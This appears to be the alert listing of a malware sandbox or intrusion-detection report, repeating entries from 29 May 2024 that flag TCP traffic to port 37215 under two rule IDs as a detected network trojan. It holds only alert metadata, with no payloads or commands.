                Timestamp:05/29/24-15:16:08.394684
                SID:2829579
                Source Port:33420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315786
                SID:2829579
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639839
                SID:2829579
                Source Port:54248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819691
                SID:2829579
                Source Port:40430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.121328
                SID:2829579
                Source Port:50776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933197
                SID:2829579
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166767
                SID:2829579
                Source Port:39134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518810
                SID:2829579
                Source Port:53620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958848
                SID:2829579
                Source Port:58016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460320
                SID:2829579
                Source Port:49076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.256943
                SID:2835222
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771219
                SID:2829579
                Source Port:51470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914955
                SID:2835222
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778359
                SID:2835222
                Source Port:60398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931183
                SID:2829579
                Source Port:38972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562161
                SID:2835222
                Source Port:33818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066641
                SID:2835222
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675488
                SID:2835222
                Source Port:60800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726372
                SID:2835222
                Source Port:33728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737481
                SID:2835222
                Source Port:45660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217949
                SID:2835222
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074576
                SID:2835222
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765584
                SID:2829579
                Source Port:48620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919856
                SID:2835222
                Source Port:48232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944007
                SID:2835222
                Source Port:60042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225244
                SID:2835222
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669335
                SID:2835222
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702148
                SID:2829579
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977750
                SID:2835222
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518834
                SID:2829579
                Source Port:53420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944849
                SID:2835222
                Source Port:44150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162428
                SID:2835222
                Source Port:58092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558039
                SID:2835222
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325795
                SID:2829579
                Source Port:42624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264036
                SID:2835222
                Source Port:45772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987255
                SID:2829579
                Source Port:35626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.395194
                SID:2829579
                Source Port:37144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421931
                SID:2835222
                Source Port:33418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326061
                SID:2835222
                Source Port:38722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331206
                SID:2835222
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815961
                SID:2829579
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419349
                SID:2829579
                Source Port:39638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945496
                SID:2835222
                Source Port:46336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.469607
                SID:2829579
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445942
                SID:2829579
                Source Port:50318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732966
                SID:2835222
                Source Port:57330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559151
                SID:2829579
                Source Port:59710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261537
                SID:2829579
                Source Port:46404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555159
                SID:2829579
                Source Port:33136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363294
                SID:2835222
                Source Port:60662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579010
                SID:2829579
                Source Port:41370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878799
                SID:2835222
                Source Port:59642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683760
                SID:2835222
                Source Port:33980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439188
                SID:2835222
                Source Port:37062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321641
                SID:2835222
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617679
                SID:2829579
                Source Port:42346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897073
                SID:2829579
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710642
                SID:2829579
                Source Port:37634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070196
                SID:2835222
                Source Port:46792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689056
                SID:2829579
                Source Port:49440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522030
                SID:2835222
                Source Port:51576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160179
                SID:2835222
                Source Port:42164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887433
                SID:2829579
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.829190
                SID:2835222
                Source Port:35060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417892
                SID:2835222
                Source Port:45404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982212
                SID:2835222
                Source Port:58692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208830
                SID:2829579
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630813
                SID:2829579
                Source Port:51716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895844
                SID:2829579
                Source Port:53036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559243
                SID:2835222
                Source Port:57236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013240
                SID:2835222
                Source Port:47812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374742
                SID:2829579
                Source Port:48192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263103
                SID:2835222
                Source Port:53920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440501
                SID:2829579
                Source Port:59800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.452082
                SID:2829579
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038246
                SID:2829579
                Source Port:50324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178425
                SID:2829579
                Source Port:44180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837305
                SID:2829579
                Source Port:33676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947767
                SID:2835222
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037684
                SID:2835222
                Source Port:39680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848302
                SID:2835222
                Source Port:39808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420871
                SID:2835222
                Source Port:45410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507298
                SID:2829579
                Source Port:41740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681999
                SID:2835222
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339299
                SID:2829579
                Source Port:35624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725999
                SID:2829579
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559586
                SID:2829579
                Source Port:59556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223981
                SID:2835222
                Source Port:60736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027374
                SID:2829579
                Source Port:60028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141199
                SID:2829579
                Source Port:42822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977298
                SID:2835222
                Source Port:47422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.044859
                SID:2835222
                Source Port:39336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891314
                SID:2835222
                Source Port:60798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669013
                SID:2829579
                Source Port:59808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868811
                SID:2829579
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321064
                SID:2835222
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223240
                SID:2829579
                Source Port:46094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228186
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163309
                SID:2829579
                Source Port:54068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465389
                SID:2835222
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780760
                SID:2829579
                Source Port:58684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784545
                SID:2835222
                Source Port:44000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583081
                SID:2829579
                Source Port:54968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811425
                SID:2835222
                Source Port:60098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617454
                SID:2835222
                Source Port:55232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436545
                SID:2829579
                Source Port:60792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897060
                SID:2835222
                Source Port:48966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518934
                SID:2835222
                Source Port:53792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091854
                SID:2835222
                Source Port:48292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420415
                SID:2829579
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622375
                SID:2829579
                Source Port:52950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666686
                SID:2829579
                Source Port:49372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944086
                SID:2829579
                Source Port:34038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568511
                SID:2835222
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.546738
                SID:2835222
                Source Port:41888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727062
                SID:2835222
                Source Port:55568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957899
                SID:2835222
                Source Port:39060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731354
                SID:2835222
                Source Port:47512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615085
                SID:2829579
                Source Port:60678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134567
                SID:2835222
                Source Port:43760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830644
                SID:2835222
                Source Port:43214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503565
                SID:2835222
                Source Port:52034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896911
                SID:2829579
                Source Port:33108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795724
                SID:2835222
                Source Port:33904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812186
                SID:2829579
                Source Port:51942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643861
                SID:2835222
                Source Port:55220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092751
                SID:2829579
                Source Port:36698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047684
                SID:2829579
                Source Port:45854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.533338
                SID:2835222
                Source Port:38286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811905
                SID:2829579
                Source Port:38564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032597
                SID:2835222
                Source Port:53172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694343
                SID:2835222
                Source Port:53326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885771
                SID:2829579
                Source Port:57026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717346
                SID:2835222
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088290
                SID:2835222
                Source Port:55266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133229
                SID:2829579
                Source Port:60354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177392
                SID:2835222
                Source Port:38992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575109
                SID:2829579
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840264
                SID:2829579
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558160
                SID:2829579
                Source Port:35042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144933
                SID:2829579
                Source Port:60082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506904
                SID:2829579
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583152
                SID:2835222
                Source Port:40848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519737
                SID:2829579
                Source Port:35950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532800
                SID:2835222
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806944
                SID:2829579
                Source Port:54058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844389
                SID:2835222
                Source Port:37422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763255
                SID:2835222
                Source Port:59070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613313
                SID:2835222
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558161
                SID:2829579
                Source Port:47188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616359
                SID:2829579
                Source Port:59542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811896
                SID:2829579
                Source Port:34874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572140
                SID:2835222
                Source Port:36856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547546
                SID:2835222
                Source Port:58740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286120
                SID:2829579
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026578
                SID:2829579
                Source Port:33582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318678
                SID:2829579
                Source Port:45380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868181
                SID:2835222
                Source Port:50740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035335
                SID:2829579
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042512
                SID:2835222
                Source Port:56048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558117
                SID:2829579
                Source Port:42842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988918
                SID:2835222
                Source Port:53474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284215
                SID:2829579
                Source Port:49978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801290
                SID:2829579
                Source Port:47142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000918
                SID:2829579
                Source Port:60998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140324
                SID:2835222
                Source Port:59076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432689
                SID:2829579
                Source Port:52516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997658
                SID:2829579
                Source Port:56330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178811
                SID:2829579
                Source Port:58194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558173
                SID:2829579
                Source Port:41640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041409
                SID:2835222
                Source Port:39686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510922
                SID:2835222
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039139
                SID:2835222
                Source Port:54446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965109
                SID:2829579
                Source Port:52002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532321
                SID:2829579
                Source Port:40912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946826
                SID:2829579
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184415
                SID:2829579
                Source Port:34210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140306
                SID:2829579
                Source Port:59032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782635
                SID:2829579
                Source Port:49994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716099
                SID:2829579
                Source Port:57888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719633
                SID:2835222
                Source Port:59108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326194
                SID:2829579
                Source Port:50766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520730
                SID:2835222
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179064
                SID:2829579
                Source Port:48914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281756
                SID:2835222
                Source Port:46374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281454
                SID:2829579
                Source Port:37502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001951
                SID:2835222
                Source Port:52718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231080
                SID:2835222
                Source Port:39314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873228
                SID:2835222
                Source Port:45622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656082
                SID:2829579
                Source Port:52932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967706
                SID:2835222
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413441
                SID:2835222
                Source Port:50626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938838
                SID:2829579
                Source Port:57002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796991
                SID:2835222
                Source Port:43756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338956
                SID:2835222
                Source Port:52938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883955
                SID:2829579
                Source Port:48722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765209
                SID:2829579
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228277
